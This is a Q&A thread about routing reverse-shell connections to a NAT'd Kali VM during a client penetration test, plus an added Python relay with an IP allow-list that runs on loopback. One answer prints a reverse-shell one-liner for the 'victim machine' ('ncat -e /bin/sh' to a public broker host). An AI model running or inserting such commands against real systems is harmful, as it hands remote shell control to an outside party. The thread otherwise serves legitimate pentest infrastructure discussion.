4

I am running Kali Linux as a VM on my Windows machine, which is NAT'd behind my company network. If I wish to pen test a website for a client and believe that a reverse shell is possible, what is a good way of achieving the connection?

Note that I am not asking how to execute the exploit or inject the shellcode, but I am asking for a simple way for my local netcat to listen on a public IP address.

My thoughts so far:

  • VPN/SSH tunnel to a server to give me a direct internet connection that my Kali VM can connect to and I use the public IP address of this connection for my reverse shell.
  • Port forward from my company's internet connection to my VM (not a good solution if multiple ports on multiple protocols are required).
  • Set up a DMZ to my Kali VM - again not a good solution on a company network.
  • Run Kali from the cloud. However, this would mean maintaining my local VM as well as the cloud version, and also Amazon would need to be informed of any penetration tests in advance.
SilverlightFox
  • Why a reverse shell? Just open a port that connecting to gives a shell. Your problem indicates that you can already execute code remotely. Set up a VPS if you NEED a reverse shell that is internet facing. –  Mar 17 '14 at 15:48
  • @Rell3oT Bind shell? If there is a firewall, egress rules are less likely. – SilverlightFox Mar 17 '14 at 15:58
  • The linked [Amazon page](https://aws.amazon.com/security/penetration-testing/) states that you need permission “for penetration testing or scanning of your resources”. So if you’re pentesting an AWS system, you need permission. But it doesn’t say anything about using an AWS system for pentesting other systems. So I guess it’s fine to use it. – Gumbo Mar 17 '14 at 16:43
  • @Gumbo Possibly - the Kali page stated `If you plan on using Kali Linux for any aggressive scanning on the Internet, make sure to update the Amazon security team`. – SilverlightFox Mar 17 '14 at 16:48
  • @SilverlightFox You could still scan from your own machine. You wouldn’t even need another Kali if you’d use port forwarding via SSH. – Gumbo Mar 17 '14 at 16:59

3 Answers

1

You could configure pwnat but you need control of both sides to negotiate the UDP hole punch. Now I want some crazy MSF developer to add this functionality to Meterpreter. Similar techniques include tools like matahari (or, older, pbounce) and particular networks such as iodine (DNS) or onioncat (Tor nodes).

If I were you, my phone would be a quick hotspot and some sort of dynamic DNS could be used. Thus, hole punching is largely unnecessary and so are a lot of other elements you allude to in your question such as IaaS, regulations, due diligence, simplicity, et al. If you have a wired corporate connection along with the WiFi hotspot connection, you could be on both networks at the same time.

atdre
0

You can do it with ncat on a third machine that is publicly accessible (I use my AWS server):

```
ncat --broker <port>
```

Attacking machine:

```
ncat <public IP> <port>
```

Victim machine:

```
ncat -e /bin/sh <public IP> <port>
```

enderw00t
0

The best solution is to run any Linux machine with a public IP address such as a VPS, an AWS machine, or even a server that you use for pentesting only.

From here you can run metasploit and/or ncat listeners. It's easiest if the firewall and iptables are disabled.

Metasploit could be run either locally but with the reverse host set to the internet based machine, or entirely on the internet based machine. Another option would be to SSH to the machine and forward ports if you want to run anything locally.

One thing to note is that for pentesting engagements it is probably undesirable to use bind shells, as there is always the possibility that a malicious party may connect and take control unless some effective form of access control is used for the shell.

SilverlightFox
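Added example, not code from any of the answers above and not part of the Ncat project: a small Python relay that shows what the public host does in the `ncat --broker` answer (accept two connections and copy bytes between them) and adds the source-address allow-list that the last answer says a listener needs, so that only the expected peers can attach to a port exposed on a public IP. Everything runs on 127.0.0.1 in a self-test; the two messages and the 192.0.2.10 allow-list entry used to demonstrate a refused peer are constructed values. Unlike `ncat --broker`, which joins any number of clients, this pairs only the first two allowed peers and gives up after a configurable number of refused connections.

```python
"""Two-party TCP relay with a source-address allow-list (added example, not code
from the answers above). Runs on 127.0.0.1 only; test values are constructed."""
import socket
import threading

def peer_allowed(addr, allowed):
    """True if the peer's IP is on the allow-list; an empty list denies everyone."""
    return addr[0] in allowed

def pump(src, dst, results, key):
    """Copy bytes src -> dst until src closes; record the count, half-close dst."""
    total = 0
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
            total += len(data)
    except OSError:
        pass
    finally:
        results[key] = total
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def run_broker(srv, allowed, max_rejected=3):
    """Pair the first two allowed peers accepted on srv and relay between them.
    Disallowed peers are closed unread; after max_rejected the broker gives up."""
    peers, rejected = [], 0
    while len(peers) < 2 and rejected < max_rejected:
        conn, addr = srv.accept()
        if peer_allowed(addr, allowed):
            peers.append(conn)
        else:
            rejected += 1
            conn.close()
    if len(peers) < 2:
        for conn in peers:
            conn.close()
        return {"paired": False, "rejected": rejected, "relayed": 0}
    a, b = peers
    results = {}
    threads = [threading.Thread(target=pump, args=(a, b, results, "a_to_b")),
               threading.Thread(target=pump, args=(b, a, results, "b_to_a"))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()
    return {"paired": True, "rejected": rejected,
            "relayed": results["a_to_b"] + results["b_to_a"]}

def _start_broker(allowed):
    """Bind an ephemeral loopback port and run the broker on it in a thread."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    stats = {}
    worker = threading.Thread(target=lambda: stats.update(run_broker(srv, allowed)))
    worker.start()
    return srv, stats, worker

def demo_paired():
    """Two allowed peers exchange one constructed message each via the broker."""
    srv, stats, worker = _start_broker({"127.0.0.1"})
    port = srv.getsockname()[1]
    side_a = socket.create_connection(("127.0.0.1", port), timeout=5)
    side_b = socket.create_connection(("127.0.0.1", port), timeout=5)
    side_a.sendall(b"hello from a")
    side_b.sendall(b"hello from b")
    side_a.shutdown(socket.SHUT_WR)
    side_b.shutdown(socket.SHUT_WR)
    got_b = side_b.makefile("rb").read()  # all bytes relayed from side a, to EOF
    got_a = side_a.makefile("rb").read()
    worker.join()
    for s in (side_a, side_b, srv):
        s.close()
    return {"a_received": got_a, "b_received": got_b, **stats}

def demo_rejected():
    """Three connections from an address off the allow-list are all refused."""
    srv, stats, worker = _start_broker({"192.0.2.10"})  # constructed; never loopback
    port = srv.getsockname()[1]
    for _ in range(3):
        c = socket.create_connection(("127.0.0.1", port), timeout=5)
        assert c.recv(1) == b""  # closed by the broker before any data flowed
        c.close()
    worker.join()
    srv.close()
    return stats

if __name__ == "__main__":
    print(demo_paired())
    print(demo_rejected())
```

The allow-list is checked before a single byte is read, so a peer that is not expected never reaches the relay logic, which is the difference between a listener anyone on the internet can reach and one that only the tester's own machine and the engagement target can use. On a real public host the same effect comes from the VPS firewall or from the `--allow` option of ncat rather than from this script.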